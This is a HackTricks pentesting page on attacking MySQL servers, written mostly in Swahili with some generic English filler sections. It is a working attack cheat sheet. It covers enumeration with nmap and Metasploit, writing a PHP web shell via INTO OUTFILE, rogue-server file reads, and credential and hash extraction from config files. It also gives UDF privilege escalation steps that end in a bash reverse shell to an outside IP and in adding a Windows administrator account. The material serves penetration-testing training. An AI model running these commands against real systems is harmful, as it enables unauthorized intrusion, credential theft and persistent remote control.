hacktricks/network-services-pentesting/pentesting-mysql.md

3306 - Pentesting Mysql

Jifunze kuhusu kuhack AWS kutoka mwanzo hadi kuwa bingwa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

• Ikiwa unataka kuona kampuni yako ikionekana kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia MPANGO WA KUJIUNGA!
• Pata swag rasmi wa PEASS & HackTricks
• Gundua The PEASS Family, mkusanyiko wetu wa NFTs za kipekee
• Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
• Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwenye HackTricks na HackTricks Cloud github repos.

RootedCON ni tukio muhimu zaidi la usalama wa mtandao nchini Spain na moja ya muhimu zaidi barani Ulaya. Kwa kukuza maarifa ya kiufundi, mkutano huu ni sehemu ya kukutana kwa wataalamu wa teknolojia na usalama wa mtandao katika kila fani.

{% embed url="https://www.rootedcon.com/" %}

Maelezo Muhimu

MySQL inaweza kuelezwa kama mfumo wa usimamizi wa Hifadhidata ya Uhusiano (RDBMS) ambao ni wa chanzo wazi na hauna gharama. Inafanya kazi kwa kutumia Lugha ya Utafutaji Iliyopangwa (SQL), kuruhusu usimamizi na uhariri wa hifadhidata.

Bandari ya chaguo-msingi: 3306

3306/tcp open  mysql

Kuunganisha

Ndani ya Nchi

mysql -u root # Connect to root without password
mysql -u root -p # A password will be asked (check someone)

Kijijini

MySQL can be accessed remotely through the network. This allows attackers to exploit vulnerabilities and gain unauthorized access to the database. As a pentester, it is important to understand the different techniques and tools that can be used to test the security of remote MySQL servers.

Port Scanning

Port scanning is the process of scanning a range of ports on a target system to identify open ports. This can be done using tools like Nmap. By scanning for open ports, a pentester can identify if the MySQL port (default is 3306) is open and accessible remotely.

Banner Grabbing

Banner grabbing is the process of retrieving information about a service running on a specific port. This can be done using tools like Telnet or Netcat. By connecting to the MySQL port and sending specific commands, a pentester can retrieve information about the MySQL server, such as the version number.

Brute-Forcing

Brute-forcing is the process of systematically trying all possible combinations of passwords until the correct one is found. This can be done using tools like Hydra or Medusa. By brute-forcing the login credentials of a remote MySQL server, a pentester can gain unauthorized access to the database.

SQL Injection

SQL injection is a technique where an attacker injects malicious SQL code into a vulnerable application, which is then executed by the database. This can be used to bypass authentication mechanisms and gain unauthorized access to the database. As a pentester, it is important to understand how to identify and exploit SQL injection vulnerabilities in remote MySQL servers.

Exploiting Vulnerabilities

MySQL, like any other software, can have vulnerabilities that can be exploited by attackers. It is important for a pentester to stay updated with the latest vulnerabilities and exploits related to MySQL. By exploiting these vulnerabilities, a pentester can gain unauthorized access to the database or perform other malicious activities.

Conclusion

Remote MySQL servers are common targets for attackers due to the sensitive information they store. As a pentester, it is important to understand the different techniques and tools that can be used to test the security of remote MySQL servers. By identifying and exploiting vulnerabilities, a pentester can help organizations secure their databases and protect sensitive information.

mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost

Uchunguzi wa Nje

Baadhi ya hatua za uchunguzi zinahitaji kuwa na sifa halali.

nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
msf> use auxiliary/scanner/mysql/mysql_version
msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds
msf> use auxiliary/admin/mysql/mysql_enum #Creds
msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds
msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds

Kuvunja nguvu

Andika data yoyote ya binary

CONVERT(unhex("6f6e2e786d6c55540900037748b75c7249b75"), BINARY)
CONVERT(from_base64("aG9sYWFhCg=="), BINARY)

Amri za MySQL

show databases;
use <database>;
connect <database>;
show tables;
describe <table_name>;
show columns from <table>;

select version(); #version
select @@version(); #version
select user(); #User
select database(); #database name

#Get a shell with the mysql client user
\! sh

#Basic MySQLi
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
Union Select 1,2,3,4,column_name from information_schema.columns where table_name="<TABLE NAME>"

#Read & Write
## Yo need FILE privilege to read & write to files.
select load_file('/var/lib/mysql-files/key.txt'); #Read file
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'

#Try to change MySQL root password
UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';
FLUSH PRIVILEGES;
quit;

mysql -u username -p < manycommands.sql #A file with all the commands you want to execute
mysql -u root -h 127.0.0.1 -e 'show databases;'

Uthibitisho wa Ruhusa za MySQL

MySQL ina mfumo wa usimamizi wa ruhusa ambao unaruhusu watumiaji kutekeleza vitendo tofauti kulingana na ruhusa zao. Wakati wa kufanya ukaguzi wa usalama wa MySQL, ni muhimu kuchunguza ruhusa za watumiaji ili kubaini ikiwa kuna upungufu wa usalama au nafasi za kuvunja mfumo.

Kuorodhesha Ruhusa za Mtumiaji

Kuorodhesha ruhusa za mtumiaji kunaweza kufanywa kwa kutumia amri ya SQL ifuatayo:

SHOW GRANTS FOR 'mtumiaji'@'kituo';

Badala ya 'mtumiaji' na 'kituo', weka jina la mtumiaji na anwani ya IP ya kituo unachotaka kuangalia ruhusa zake.

Kuorodhesha Ruhusa za Wote

Ikiwa unataka kuorodhesha ruhusa za watumiaji wote, unaweza kutumia amri ifuatayo:

SELECT user, host, authentication_string FROM mysql.user;

Amri hii itaonyesha jina la mtumiaji, anwani ya IP ya kituo, na kamba ya uthibitishaji ya mtumiaji.

Kuorodhesha Ruhusa za Database

Kuorodhesha ruhusa za mtumiaji kwa database fulani inaweza kufanywa kwa kutumia amri ifuatayo:

SHOW GRANTS FOR 'mtumiaji'@'kituo' ON jina_la_database;

Badala ya 'mtumiaji', 'kituo', na 'jina_la_database', weka habari sahihi kulingana na mahitaji yako.

Kuorodhesha Ruhusa za Kazi Maalum

Ikiwa unataka kuorodhesha ruhusa za kazi maalum, unaweza kutumia amri ifuatayo:

SHOW GRANTS FOR 'mtumiaji'@'kituo' ON jina_la_database.jina_la_kazi;

Badala ya 'mtumiaji', 'kituo', 'jina_la_database', na 'jina_la_kazi', weka habari sahihi kulingana na mahitaji yako.

Hitimisho

Kuorodhesha ruhusa za mtumiaji ni hatua muhimu katika ukaguzi wa usalama wa MySQL. Inakuruhusu kuchunguza na kubaini upungufu wa usalama na nafasi za kuvunja mfumo.

#Mysql
SHOW GRANTS [FOR user];
SHOW GRANTS;
SHOW GRANTS FOR 'root'@'localhost';
SHOW GRANTS FOR CURRENT_USER();

# Get users, permissions & hashes
SELECT * FROM mysql.user;

#From DB
select * from mysql.user where user='root';
## Get users with file_priv
select user,file_priv from mysql.user where file_priv='Y';
## Get users with Super_priv
select user,Super_priv from mysql.user where Super_priv='Y';

# List functions
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION';
#@ Functions not from sys. db
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' AND routine_schema!='sys';

Unaweza kuona katika nyaraka maana ya kila haki: https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html

MySQL File RCE

{% content-ref url="../pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md" %} mysql-ssrf.md {% endcontent-ref %}

Kusoma faili yoyote ya MySQL kwa njia ya mteja

Kwa kweli, unapojaribu kupakia data ya eneo katika meza yaliyomo ya faili seva ya MySQL au MariaDB inauliza mteja kuisoma na kutuma yaliyomo. Kwa hivyo, ikiwa unaweza kuhariri mteja wa mysql kuunganisha kwenye seva yako ya MySQL, unaweza kusoma faili yoyote.
Tafadhali kumbuka kuwa hii ndiyo tabia inayotumika:

load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

(Kumbuka neno "local")
Kwa sababu bila "local" unaweza kupata:

mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

Uthibitisho wa Awali: https://github.com/allyshka/Rogue-MySql-Server
Katika karatasi hii unaweza kuona maelezo kamili ya shambulio na hata jinsi ya kuongeza RCE: https://paper.seebug.org/1113/
Hapa unaweza kupata muhtasari wa shambulio: http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/

​

​​RootedCON ni tukio muhimu zaidi la usalama wa mtandao nchini Hispania na moja ya muhimu zaidi barani Ulaya. Kwa kukuza maarifa ya kiufundi, mkutano huu ni mahali pazuri pa kukutana kwa wataalamu wa teknolojia na usalama wa mtandao katika kila fani.

{% embed url="https://www.rootedcon.com/" %}

POST

Mtumiaji wa Mysql

Itakuwa ya kuvutia sana ikiwa mysql inaendesha kama root:

cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user"
systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1

Mipangilio Hatari ya mysqld.cnf

Katika usanidi wa huduma za MySQL, mipangilio mbalimbali hutumiwa kufafanua uendeshaji wake na hatua za usalama:

• Mipangilio ya user hutumiwa kumtaja mtumiaji ambaye huduma ya MySQL itatekelezwa chini yake.
• password hutumiwa kuweka nenosiri linalohusishwa na mtumiaji wa MySQL.
• admin_address inabainisha anwani ya IP inayosikiliza kwa ajili ya uhusiano wa TCP/IP kwenye kiolesura cha mtandao cha utawala.
• Kipengele cha debug kinaonyesha mipangilio ya sasa ya uchunguzi, ikiwa ni pamoja na habari nyeti ndani ya magogo.
• sql_warnings inasimamia ikiwa vifungu vya habari vinazalishwa kwa taarifa za kuingiza safu moja wakati onyo linatokea, likiwa na data nyeti ndani ya magogo.
• Kwa kutumia secure_file_priv, wigo wa shughuli za uingizaji na usafirishaji wa data unadhibitiwa ili kuimarisha usalama.

Kuongeza Mamlaka ya Kupata

# Get current user (an all users) privileges and hashes
use mysql;
select user();
select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user;

# Get users, permissions & creds
SELECT * FROM mysql.user;
mysql -u root --password=<PASSWORD> -e "SELECT * FROM mysql.user;"

# Create user and give privileges
create user test identified by 'test';
grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;

# Get a shell (with your permissions, usefull for sudo/suid privesc)
\! sh

Kupanda Hadhi kwa Kutumia Maktaba

Ikiwa seva ya mysql inaendeshwa kama root (au mtumiaji mwenye mamlaka zaidi), unaweza kuitumia kutekeleza amri. Kwa hili, unahitaji kutumia kazi zilizoundwa na mtumiaji. Na ili kuunda kazi iliyoundwa na mtumiaji, utahitaji maktaba kwa mfumo wa uendeshaji unaotumika na mysql.

Maktaba mbaya ya kutumia inaweza kupatikana ndani ya sqlmap na ndani ya metasploit kwa kufanya locate "*lib_mysqludf_sys*". Faili za .so ni maktaba za linux na faili za .dll ni za Windows, chagua ile unayohitaji.

Ikiwa huna maktaba hizo, unaweza kuzitafuta, au pakua msimbo wa C wa linux hapa na uusakinishe ndani ya mashine ya linux yenye udhaifu:

gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

Sasa unapokuwa na maktaba, ingia ndani ya Mysql kama mtumiaji mwenye mamlaka (root?) na fuata hatua zifuatazo:

Linux

# Use a database
use mysql;
# Create a table to load the library and move it to the plugins dir
create table npn(line blob);
# Load the binary library inside the table
## You might need to change the path and file name
insert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));
# Get the plugin_dir path
show variables like '%plugin%';
# Supposing the plugin dir was /usr/lib/x86_64-linux-gnu/mariadb19/plugin/
# dump in there the library
select * from npn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so';
# Create a function to execute commands
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
# Execute commands
select sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt');
select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');

Windows

MySQL Enumeration

MySQL Service Detection

To detect if MySQL service is running on a Windows machine, you can use the following command:

sc query mysql

If the service is running, you will see the output with the service status and other information.

MySQL Version Detection

To determine the version of MySQL running on a Windows machine, you can use the following command:

mysql --version

This command will display the MySQL version information.

MySQL Default Credentials

By default, MySQL does not have any default credentials. However, it is common for users to set weak or easily guessable passwords. Therefore, it is recommended to try common default credentials such as root:root, admin:admin, or mysql:mysql.

MySQL User Enumeration

To enumerate the users in a MySQL database on a Windows machine, you can use the following command:

mysql -u <username> -p<password> -e "SELECT user FROM mysql.user"

Replace <username> with a valid username and <password> with the corresponding password.

MySQL Database Enumeration

To enumerate the databases in a MySQL server on a Windows machine, you can use the following command:

mysql -u <username> -p<password> -e "SHOW DATABASES"

Replace <username> with a valid username and <password> with the corresponding password.

MySQL Table Enumeration

To enumerate the tables in a specific database in a MySQL server on a Windows machine, you can use the following command:

mysql -u <username> -p<password> -e "USE <database>; SHOW TABLES"

Replace <username> with a valid username, <password> with the corresponding password, and <database> with the name of the database.

MySQL Column Enumeration

To enumerate the columns in a specific table in a MySQL server on a Windows machine, you can use the following command:

mysql -u <username> -p<password> -e "USE <database>; SHOW COLUMNS FROM <table>"

Replace <username> with a valid username, <password> with the corresponding password, <database> with the name of the database, and <table> with the name of the table.

MySQL Data Enumeration

To enumerate the data in a specific table in a MySQL server on a Windows machine, you can use the following command:

mysql -u <username> -p<password> -e "USE <database>; SELECT * FROM <table>"

Replace <username> with a valid username, <password> with the corresponding password, <database> with the name of the database, and <table> with the name of the table.

# CHech the linux comments for more indications
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));
show variables like '%plugin%';
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");

Kupata siri za MySQL kutoka kwenye faili

Ndani ya /etc/mysql/debian.cnf unaweza kupata nywila ya maandishi wazi ya mtumiaji debian-sys-maint

cat /etc/mysql/debian.cnf

Unaweza kutumia sifa hizi za kuingia kwenye kikundi cha mysql.

Ndani ya faili: /var/lib/mysql/mysql/user.MYD unaweza kupata hash zote za watumiaji wa MySQL (zile unazoweza kuzitoa kutoka mysql.user ndani ya kikundi cha data).

Unaweza kuzitoa kwa kufanya:

grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"

Kuwezesha kumbukumbu

Unaweza kuwezesha kumbukumbu za maswali ya mysql ndani ya /etc/mysql/my.cnf kwa kufuta alama za mstari zifuatazo:

Faili za kufaa

Faili za Usanidi

• windows *
• config.ini
• my.ini
• windows\my.ini
• winnt\my.ini
• <InstDir>/mysql/data/
• unix
• my.cnf
• /etc/my.cnf
• /etc/mysql/my.cnf
• /var/lib/mysql/my.cnf
• ~/.my.cnf
• /etc/my.cnf
• Historia ya Amri
• ~/.mysql.history
• Faili za Kumbukumbu
• connections.log
• update.log
• common.log

Hifadhidata/Meza za Msingi za MySQL

ALL_PLUGINS
APPLICABLE_ROLES
CHARACTER_SETS
CHECK_CONSTRAINTS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
ENABLED_ROLES
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEY_COLUMN_USAGE
KEY_CACHES
OPTIMIZER_TRACE
PARAMETERS
PARTITIONS
PLUGINS
PROCESSLIST
PROFILING
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
SYSTEM_VARIABLES
TABLES
TABLESPACES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
INNODB_LOCKS
INNODB_TRX
INNODB_SYS_DATAFILES
INNODB_FT_CONFIG
INNODB_SYS_VIRTUAL
INNODB_CMP
INNODB_FT_BEING_DELETED
INNODB_CMP_RESET
INNODB_CMP_PER_INDEX
INNODB_CMPMEM_RESET
INNODB_FT_DELETED
INNODB_BUFFER_PAGE_LRU
INNODB_LOCK_WAITS
INNODB_TEMP_TABLE_INFO
INNODB_SYS_INDEXES
INNODB_SYS_TABLES
INNODB_SYS_FIELDS
INNODB_CMP_PER_INDEX_RESET
INNODB_BUFFER_PAGE
INNODB_FT_DEFAULT_STOPWORD
INNODB_FT_INDEX_TABLE
INNODB_FT_INDEX_CACHE
INNODB_SYS_TABLESPACES
INNODB_METRICS
INNODB_SYS_FOREIGN_COLS
INNODB_CMPMEM
INNODB_BUFFER_POOL_STATS
INNODB_SYS_COLUMNS
INNODB_SYS_FOREIGN
INNODB_SYS_TABLESTATS
GEOMETRY_COLUMNS
SPATIAL_REF_SYS
CLIENT_STATISTICS
INDEX_STATISTICS
USER_STATISTICS
INNODB_MUTEXES
TABLE_STATISTICS
INNODB_TABLESPACES_ENCRYPTION
user_variables
INNODB_TABLESPACES_SCRUBBING
INNODB_SYS_SEMAPHORE_WAITS

columns_priv
column_stats
db
engine_cost
event
func
general_log
gtid_executed
gtid_slave_pos
help_category
help_keyword
help_relation
help_topic
host
index_stats
innodb_index_stats
innodb_table_stats
ndb_binlog_index
plugin
proc
procs_priv
proxies_priv
roles_mapping
server_cost
servers
slave_master_info
slave_relay_log_info
slave_worker_info
slow_log
tables_priv
table_stats
time_zone
time_zone_leap_second
time_zone_name
time_zone_transition
time_zone_transition_type
transaction_registry
user

accounts
cond_instances
events_stages_current
events_stages_history
events_stages_history_long
events_stages_summary_by_account_by_event_name
events_stages_summary_by_host_by_event_name
events_stages_summary_by_thread_by_event_name
events_stages_summary_by_user_by_event_name
events_stages_summary_global_by_event_name
events_statements_current
events_statements_history
events_statements_history_long
events_statements_summary_by_account_by_event_name
events_statements_summary_by_digest
events_statements_summary_by_host_by_event_name
events_statements_summary_by_program
events_statements_summary_by_thread_by_event_name
events_statements_summary_by_user_by_event_name
events_statements_summary_global_by_event_name
events_transactions_current
events_transactions_history
events_transactions_history_long
events_transactions_summary_by_account_by_event_name
events_transactions_summary_by_host_by_event_name
events_transactions_summary_by_thread_by_event_name
events_transactions_summary_by_user_by_event_name
events_transactions_summary_global_by_event_name
events_waits_current
events_waits_history
events_waits_history_long
events_waits_summary_by_account_by_event_name
events_waits_summary_by_host_by_event_name
events_waits_summary_by_instance
events_waits_summary_by_thread_by_event_name
events_waits_summary_by_user_by_event_name
events_waits_summary_global_by_event_name
file_instances
file_summary_by_event_name
file_summary_by_instance
global_status
global_variables
host_cache
hosts
memory_summary_by_account_by_event_name
memory_summary_by_host_by_event_name
memory_summary_by_thread_by_event_name
memory_summary_by_user_by_event_name
memory_summary_global_by_event_name
metadata_locks
mutex_instances
objects_summary_global_by_type
performance_timers
prepared_statements_instances
replication_applier_configuration
replication_applier_status
replication_applier_status_by_coordinator
replication_applier_status_by_worker
replication_connection_configuration
replication_connection_status
replication_group_member_stats
replication_group_members
rwlock_instances
session_account_connect_attrs
session_connect_attrs
session_status
session_variables
setup_actors
setup_consumers
setup_instruments
setup_objects
setup_timers
socket_instances
socket_summary_by_event_name
socket_summary_by_instance
status_by_account
status_by_host
status_by_thread
status_by_user
table_handles
table_io_waits_summary_by_index_usage
table_io_waits_summary_by_table
table_lock_waits_summary_by_table
threads
user_variables_by_thread
users
variables_by_thread

host_summary
host_summary_by_file_io
host_summary_by_file_io_type
host_summary_by_stages
host_summary_by_statement_latency
host_summary_by_statement_type
innodb_buffer_stats_by_schema
innodb_buffer_stats_by_table
innodb_lock_waits
io_by_thread_by_latency
io_global_by_file_by_bytes
io_global_by_file_by_latency
io_global_by_wait_by_bytes
io_global_by_wait_by_latency
latest_file_io
schema_table_statistics
schema_table_statistics_with_buffer
schema_tables_with_full_table_scans
schema_unused_indexes
session
session_ssl_status
statement_analysis
statements_with_errors_or_warnings
statements_with_full_table_scans
statements_with_runtimes_in_95th_percentile
statements_with_sorting
statements_with_temp_tables
sys_config
user_summary
user_summary_by_file_io
user_summary_by_file_io_type
user_summary_by_stages
user_summary_by_statement_latency
user_summary_by_statement_type
version
wait_classes_global_by_avg_latency
wait_classes_global_by_latency
waits_by_host_by_latency
waits_by_user_by_latency
waits_global_by_latency
x$host_summary
x$host_summary_by_file_io
x$host_summary_by_file_io_type
x$host_summary_by_stages
x$host_summary_by_statement_latency
x$host_summary_by_statement_type
x$innodb_buffer_stats_by_schema
x$innodb_buffer_stats_by_table
x$innodb_lock_waits
x$io_by_thread_by_latency
x$io_global_by_file_by_bytes
x$io_global_by_file_by_latency
x$io_global_by_wait_by_bytes
x$io_global_by_wait_by_latency
x$latest_file_io
x$memory_by_host_by_current_bytes
x$memory_by_thread_by_current_bytes
x$memory_by_user_by_current_bytes
x$memory_global_by_current_bytes
x$memory_global_total
x$processlist
x$ps_digest_95th_percentile_by_avg_us
x$ps_digest_avg_latency_distribution
x$ps_schema_table_statistics_io
x$schema_flattened_keys
x$schema_index_statistics
x$schema_table_lock_waits
x$schema_table_statistics
x$schema_table_statistics_with_buffer
x$schema_tables_with_full_table_scans
x$session
x$statement_analysis
x$statements_with_errors_or_warnings
x$statements_with_full_table_scans
x$statements_with_runtimes_in_95th_percentile
x$statements_with_sorting
x$statements_with_temp_tables
x$user_summary
x$user_summary_by_file_io
x$user_summary_by_file_io_type
x$user_summary_by_stages
x$user_summary_by_statement_latency
x$user_summary_by_statement_type
x$wait_classes_global_by_avg_latency
x$wait_classes_global_by_latency
x$waits_by_host_by_latency
x$waits_by_user_by_latency
x$waits_global_by_latency

Amri za Kiotomatiki za HackTricks

Protocol_Name: MySql    #Protocol Abbreviation if there is one.
Port_Number:  3306     #Comma separated if there is more than one.
Protocol_Description: MySql     #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for MySql
Note: |
MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL).

https://book.hacktricks.xyz/pentesting/pentesting-mysql

Entry_2:
Name: Nmap
Description: Nmap with MySql Scripts
Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306

Entry_3:
Name: MySql
Description: Attempt to connect to mysql server
Command: mysql -h {IP} -u {Username}@localhost

Entry_4:
Name: MySql consolesless mfs enumeration
Description: MySql enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit'

RootedCON ni tukio muhimu zaidi la usalama wa mtandao nchini Hispania na moja ya muhimu zaidi barani Ulaya. Kwa kukuza maarifa ya kiufundi, mkutano huu ni mahali pa kukutana kwa wataalamu wa teknolojia na usalama wa mtandao katika kila fani.

{% embed url="https://www.rootedcon.com/" %}

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS wa HackTricks)!

Njia nyingine za kusaidia HackTricks:

• Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia MPANGO WA KUJIUNGA!
• Pata swag rasmi ya PEASS & HackTricks
• Gundua The PEASS Family, mkusanyiko wetu wa NFTs ya kipekee
• Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
• Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye HackTricks na HackTricks Cloud github repos.